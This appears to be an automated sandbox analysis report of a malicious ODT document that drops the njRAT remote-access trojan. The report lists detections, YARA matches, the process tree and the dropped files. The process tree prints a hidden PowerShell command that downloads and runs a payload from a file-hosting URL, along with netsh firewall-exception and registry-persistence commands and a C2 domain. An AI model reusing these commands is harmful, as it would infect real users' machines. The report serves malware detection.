19:55:53	API Interceptor	1499x Sleep call for process: mshta.exe modified
19:56:01	API Interceptor	37x Sleep call for process: powershell.exe modified
19:56:15	API Interceptor	2x Sleep call for process: exploit.exe modified
19:56:24	API Interceptor	5x Sleep call for process: netsh.exe modified
19:56:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b "C:\Users\user\AppData\Local\Temp\dllhost.exe" ..
19:56:34	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b "C:\Users\user\AppData\Local\Temp\dllhost.exe" ..
19:56:42	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
AutoformLiscence bls activation.odt	29%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\exploit.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\dllhost.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\exploit.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\dllhost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
16.0.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
10.2.exploit.exe.1d0000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
11.0.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
15.0.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
11.2.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
10.0.exploit.exe.1d0000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
15.2.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
16.2.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File

Domains

Source	Detection	Scanner	Label	Link
amibas8722.ddns.net	6%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.%s.comPA	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	Google Safe Browsing	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\exploit.exe	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
C:\Users\user\AppData\Local\Temp\exploit.exe	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Local\Temp\exploit.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
C:\Users\user\AppData\Local\Temp\dllhost.exe	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
C:\Users\user\AppData\Local\Temp\dllhost.exe	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Local\Temp\dllhost.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
00000009.00000002.520219680.023FF000.00000004.00000001.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x11172:$reg: SEE_MASK_NOZONECHECKS 0x162c1:$reg: SEE_MASK_NOZONECHECKS 0x1124a:$msg: Execute ERROR 0x112a6:$msg: Execute ERROR 0x16399:$msg: Execute ERROR 0x163f5:$msg: Execute ERROR 0x11134:$ping: cmd.exe /c ping 0 -n 2 & del 0x16283:$ping: cmd.exe /c ping 0 -n 2 & del
00000009.00000002.520219680.023FF000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x111a2:$a1: netsh firewall add allowedprogram 0x162f1:$a1: netsh firewall add allowedprogram 0x11172:$a2: SEE_MASK_NOZONECHECKS 0x162c1:$a2: SEE_MASK_NOZONECHECKS 0x1141c:$b1: [TAP] 0x1656b:$b1: [TAP] 0x11134:$c3: cmd.exe /c ping 0x16283:$c3: cmd.exe /c ping
0000000A.00000002.535195631.01905000.00000004.00000001.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x1068:$reg: SEE_MASK_NOZONECHECKS 0x711c:$reg: SEE_MASK_NOZONECHECKS 0x71f4:$msg: Execute ERROR 0x7250:$msg: Execute ERROR 0x70de:$ping: cmd.exe /c ping 0 -n 2 & del
0000000A.00000002.535195631.01905000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x10b8:$a1: netsh firewall add allowedprogram 0x714c:$a1: netsh firewall add allowedprogram 0x1068:$a2: SEE_MASK_NOZONECHECKS 0x711c:$a2: SEE_MASK_NOZONECHECKS 0x73c6:$b1: [TAP] 0x70de:$c3: cmd.exe /c ping
0000000F.00000000.586989058.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000F.00000000.586989058.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
00000010.00000002.610854599.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
00000010.00000002.610854599.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
0000000F.00000002.600191296.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000F.00000002.600191296.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
0000000B.00000000.533213752.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000B.00000000.533213752.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
00000010.00000000.597361125.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
00000010.00000000.597361125.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
0000000B.00000002.756194496.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000B.00000002.756194496.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping

Unpacked PEs

Source	Rule	Description	Author	Strings
11.0.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
10.2.exploit.exe.1d0000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
11.0.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
10.2.exploit.exe.1d0000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
11.0.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
10.2.exploit.exe.1d0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
16.0.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
16.0.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
16.0.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
15.0.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
15.0.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
15.0.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
11.2.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
11.2.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
11.2.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
10.0.exploit.exe.1d0000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
10.0.exploit.exe.1d0000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
10.0.exploit.exe.1d0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
16.2.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
16.2.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
16.2.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
15.2.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
15.2.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
15.2.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
a.top4top.net	Info.doc	Get hash	malicious	Browse	51.15.9.13

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Your_Purchase_4396143.xls	Get hash	malicious	Browse	163.172.46.38
	Bofa_Charge01312019.xlsm	Get hash	malicious	Browse	163.172.46.38
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	163.172.46.38
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	163.172.46.38
	14308278291.xlsm	Get hash	malicious	Browse	163.172.46.38
	FILEY595000383.doc	Get hash	malicious	Browse	163.172.46.38
	FILEY595000383.doc	Get hash	malicious	Browse	163.172.46.38
	PO53473.doc	Get hash	malicious	Browse	163.172.46.38
	Facture_Num_OFH30703.doc	Get hash	malicious	Browse	163.172.46.38
	DOK97159672110.doc	Get hash	malicious	Browse	163.172.46.38
	vXZa4D4m4V.xls	Get hash	malicious	Browse	163.172.46.38
	Prepared_Purchase_Info_429458.doc	Get hash	malicious	Browse	163.172.46.38
	1704007#U682a#U5f0f#U4f1a#U793e04082.xls	Get hash	malicious	Browse	163.172.46.38
	62918504564317 .xls	Get hash	malicious	Browse	163.172.46.38
	571275114140SS .xls	Get hash	malicious	Browse	163.172.46.38
	Documento.FT.60803.modifiche_societarie.xls	Get hash	malicious	Browse	163.172.46.38
	Documento_081507_FT_20190415_0006009_.xls	Get hash	malicious	Browse	163.172.46.38
	Documento_057496_FT_20190415_0005008_.xls	Get hash	malicious	Browse	163.172.46.38
	Scanmalta Client Invoice Statements.xls	Get hash	malicious	Browse	163.172.46.38
	fee-docs.doc	Get hash	malicious	Browse	163.172.46.38

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

WINWORD.EXE (PID: 2632 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)

verclsid.exe (PID: 2232 cmdline: 'C:\Windows\system32\verclsid.exe' /S /C {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B} MD5: 42B2A7CBD7838214EECE6B6455C34BC6)

mshta.exe (PID: 2312 cmdline: 'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Temp\Exploit (2).hta' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

dllhost.exe (PID: 4024 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: A63DC5C2EA944E6657203E0C8EDEAF61)

mshta.exe (PID: 1736 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

mshta.exe (PID: 1816 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)

cmd.exe (PID: 2420 cmdline: cmd.exe /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 2344 cmdline: PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

exploit.exe (PID: 3068 cmdline: 'C:\Users\user\AppData\Local\Temp\exploit.exe' MD5: 2C0D5DF5FE0A7B992DAC6A94A3874D2B)

dllhost.exe (PID: 2612 cmdline: 'C:\Users\user\AppData\Local\Temp\dllhost.exe' MD5: 2C0D5DF5FE0A7B992DAC6A94A3874D2B)

netsh.exe (PID: 3012 cmdline: netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLE MD5: 784A50A6A09C25F011C3143DDD68E729)

dllhost.exe (PID: 3244 cmdline: 'C:\Users\user\AppData\Local\Temp\dllhost.exe' .. MD5: 2C0D5DF5FE0A7B992DAC6A94A3874D2B)

dllhost.exe (PID: 392 cmdline: 'C:\Users\user\AppData\Local\Temp\dllhost.exe' .. MD5: 2C0D5DF5FE0A7B992DAC6A94A3874D2B)

cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17F6021B.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
Size (bytes):	3704
Entropy (8bit):	2.278073026875601
Encrypted:	false
MD5:	7124034BF0B0F3408D417A80A01EC5A7
SHA1:	31628F8189F8EBA66E1F345AFC2E7EAC59E16F1F
SHA-256:	E884C8EA338D65941449C4AE83FE4461219D0E43F08A833C962E8FDC0D218E2A
SHA-512:	9C2CCDB832E5E56DD41BD98933926AFA6071A322823EFB2CE20381E0117FCB283E2B2327A77F70C833CEE0E7A0EDED05B5CC76CA509211272D89070AF1127DBE
Malicious:	false
Reputation:	low
Preview:	......<.....!.....................5.E.........................Segoe UI............@.......'.......-...........................A..... . ..... . .....(... ...@.......................................................................................................................................................................................................................................................................................................!...A.F.f. . ..... . .....(... ... .................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D2A7DE1.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 5639 x 4 x 0 +4 "\004"
Size (bytes):	535648
Entropy (8bit):	2.3215817599373323
Encrypted:	false
MD5:	8E2C57B01B05B036AE6B0EF89BC4A029
SHA1:	16755DA6F289F7B0638EAD1D13375B3048C2450C
SHA-256:	A2631493CDA8FDE3CB576B3961FD516CFF949C992AB1D2EDA5BF2A4542400C5A
SHA-512:	20DFBEA098B933B431B06089C0B5689430F7AFB7E96D3B0F8CF67AE2D2E46391363933817930B145EBF0071DDB02CB347322915B12ADB3D89FBA17D72D1E36A4
Malicious:	false
Reputation:	low
Preview:	......0...................................e.............................A. ...e.......e.......(.......e............+.................................{{{s{{sssccccccZcccccZZccccZZcZccZZZcccZZZcccZZZcccZZZcccZZZcccZZZcccZZccccZZccccZZZcccZZZcccZZZcccZZZcccZZZcccZZZcccZZccccZZccccZZZcccZZZcccZZZcccZZZcccZZZcccZZZcccZZccccZZccccZZZcccZZZcccZZZcccZZZcccZZZcccZZZcccZZccccZZccccZZZcccZZZcccZZZcccZZZcccZZZcccZZZcccZZccccZZccccZZZcccZZZcccZZZcccZZccccZZZcccZZZcccZZccccZZccccZZZcccZZZcccZZZcccZZccccZZZcZcZZccccZZZcZcZZccccZZZcZcZZccccZZZcZcZZccccZZZcZcZZccccZZccZcZZccccZZZcZcZZccccZZZcZcZZccccZZZcZcZZccccZZccZcZZccZcZZZcZcZZccccZZZcZcZZccccZZZcZcZZccccZZccZcZZccZcZZZcccZZZcccZZZcccZZZcccZZZcccZZccccZZccZcZZccccZZZZZZZZZZZZZZZZZZZZZcccZZZcccZZZcccZZccccZZccccZZZcccZZZcccZZZcccZZZcccZZZcccZZZcccZZccccZZccccZZZcccZZZcccZZZcccZZZcccZZZcccZZccccZZccccZZccccZZZcZcZZccccZZccccZZccccZZZZZcZZZcZcZZZZZcZZccZcZZZZZZZZZZZZZZZZZZZZZZZZZZZZZcZZZZZcZRZZZcZZZZZcZZZZZZZZZZZZZZZZZZZZZZZZZZZZZcZZZZZcZZZZZcZZZZZcZZ

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70F7DD60.wmz Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
Size (bytes):	3704
Entropy (8bit):	2.278073026875601
Encrypted:	false
MD5:	7124034BF0B0F3408D417A80A01EC5A7
SHA1:	31628F8189F8EBA66E1F345AFC2E7EAC59E16F1F
SHA-256:	E884C8EA338D65941449C4AE83FE4461219D0E43F08A833C962E8FDC0D218E2A
SHA-512:	9C2CCDB832E5E56DD41BD98933926AFA6071A322823EFB2CE20381E0117FCB283E2B2327A77F70C833CEE0E7A0EDED05B5CC76CA509211272D89070AF1127DBE
Malicious:	false
Reputation:	low
Preview:	......<.....!.....................5.E.........................Segoe UI............@.......'.......-...........................A..... . ..... . .....(... ...@.......................................................................................................................................................................................................................................................................................................!...A.F.f. . ..... . .....(... ... .................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2CFA42A0-AEB3-4C63-9DD7-49AB77407032}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1536
Entropy (8bit):	1.031612049735253
Encrypted:	false
MD5:	E350EECC8BC6A7EC5611968A3C293578
SHA1:	7A160648E344448A4B4C875DA6A8D58FB06E1645
SHA-256:	514F80D910443BAFBE9C5ECF97D14E95E8179098D01F8631CEBD9020E5BB0A3E
SHA-512:	9F24ADBC6F15B81670391EC8B524E1E74BEC7A15F5FE07C4757CF0FEFDC488B609F9D9F8417541AADB21D263D749073D368B7CCA2F531890C101B36C10C4CF79
Malicious:	false
Reputation:	low
